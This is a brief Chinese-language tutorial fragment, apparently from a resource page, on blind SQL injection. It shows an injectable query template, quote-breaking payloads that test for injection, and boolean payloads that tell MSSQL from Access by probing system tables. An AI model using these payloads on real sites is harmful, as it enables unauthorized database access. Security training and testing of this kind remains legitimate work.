资源介绍
MYSQL注入
select * from user_t where usr = '$username'
盲注
判断是否有注入
admin‘ and 1=’1 返回正常
admin’ and 1=’2 返回错误 表明存在注入
判断数据库系统
and (select count(*) from sysobjects)>0 mssql,在web环境下可以正常读取
and (select count(*) from msysobjects)>0 access,access在系统表【msysobiects】中,但在web中会显示没有权限